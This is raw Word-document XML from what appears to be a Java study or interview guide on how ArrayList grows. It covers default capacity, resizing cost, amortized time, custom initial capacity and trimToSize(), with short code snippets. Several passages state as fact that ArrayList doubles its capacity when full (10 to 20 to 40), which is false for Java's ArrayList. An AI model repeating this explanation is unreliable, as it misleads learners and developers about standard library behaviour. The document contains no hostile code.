    <w:p w14:paraId="3B3EE07D" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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636E343" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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 Adding 10 elements (array capacity is 10 by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B988F6" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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or (int i = 1; i &lt;= 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C81685" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211494EE" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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DA2332C" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4291E81D" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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ize before resizing: " + list.size());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72828529" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143B73ED" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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dding the 11th element will trigger resizing (capacity will double)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB12A7" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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11);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A677C6A" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1CCFFE" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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ize after resizing: " + list.size());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6402CF" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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ACCC09A" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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C05A218" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itially, the ArrayList has a capacity of 10, but after adding 10 elements, the capacity will increase to 20 when the 11th element is added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F285DDD" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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internal array grows by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubling the previous capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when resizing is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA5DDC0" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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Time Complexity of Resizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838C8E5" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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izing is an expensive operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it involves creating a new array and copying the elements from the old array to the new one. The time complexity for resizing is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where n is the number of elements in the array at the time of resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757FD13B" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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owever, resizing does not happen every time you add an element. It only happens when the capacity is exceeded, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized time complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for adding elements to the ArrayList is still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on average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438AAEAF" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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7. Custom Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C38EE" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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 specify an initial capacity when creating the ArrayList to avoid resizing during the initial insertions if you know you'll have a large number of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00D5A1" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(50);  // initial capacity of 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E107327" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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helps avoid the overhead of resizing when the array is full and also helps in reducing the number of reallocations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E8E23" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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8. Shrinking the Array (Manually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073FAEEF" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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lthough ArrayList automatically grows when more elements are added, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not automatically shrink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when elements are removed. This can result in wasted memory if many elements are removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3126AE9D" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shrink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the capacity of the ArrayList to match the current size, you can call the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>trimToSize()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340581D2" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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trimToSize();  // Adjusts the internal array size to match the current size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52522563" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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helps reduce memory usage by eliminating unused space in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34712779" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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 of Resizing Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740424FF" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itial Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 10 (default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C34E2" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ize Mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When the ArrayList reaches capacity, it creates a new array that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>twice the size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the previous one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555B1D3" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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mortized Time Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The resizing operation takes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time, but this happens infrequently, so adding elements typically takes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on average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13939876" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ustom Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can set the initial capacity to avoid frequent resizing for large collections of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204CB22C" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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dynamic resizing behavior ensures that ArrayList can efficiently manage its size as elements are added, without requiring the user to manually resize the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779965A2" w14:textId="1EB304FB"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2944F4C">
          <v:rect id="_x0000_i1503" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31E22C" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc196307639"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ArrayList grow?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="57B3C782" w14:textId="67DF55B3" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">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in Java grows dynamically by doubling its size whenever it reaches its capacity limit. Here's a detailed explanation of how this growth process works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9BC78" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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ow ArrayList Grows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C003D6" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Initial Capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42600414" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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you create an ArrayList, it has an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is 10 by default if not specified).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78895D36" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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apacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the number of elements the internal array of the ArrayList can hold without needing to resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C9DAAD" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(); // Default capacity is 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6F4A5" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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you specify the initial capacity, the array will be created with that size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B741099" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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ArrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(50); // Initial capacity of 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD68F7" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Adding Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0C315" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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elements are added to the ArrayList using methods like add(), it checks if there is enough capacity in the internal array to hold the new element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B68D4D1" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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internal array has space, the element is simply added to the next available index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB94E1B" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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When the ArrayList Runs Out of Space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F66F81" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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the ArrayList has reached its maximum capacity (i.e., the number of elements exceeds the internal array's capacity), the ArrayList </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles its size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to accommodate more elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320478F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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new, larger array is created, and the elements from the old array are copied into the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48660C6C" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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example, if the internal array had a capacity of 10 and you try to add an 11th element, the ArrayList will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7630E" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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reate a new array with a capacity of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (double the previous capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669FBF10" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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py all the existing elements to the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971C4BF" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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dd the new element to the newly resized array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95977F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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Growth Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1C13F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the ArrayList </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each time the array becomes full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF6D1F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CA12EE" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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itial capacity: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145180B" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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fter 10 elements, capacity grows to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B820D5" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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fter 20 elements, capacity grows to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
    </w:p>
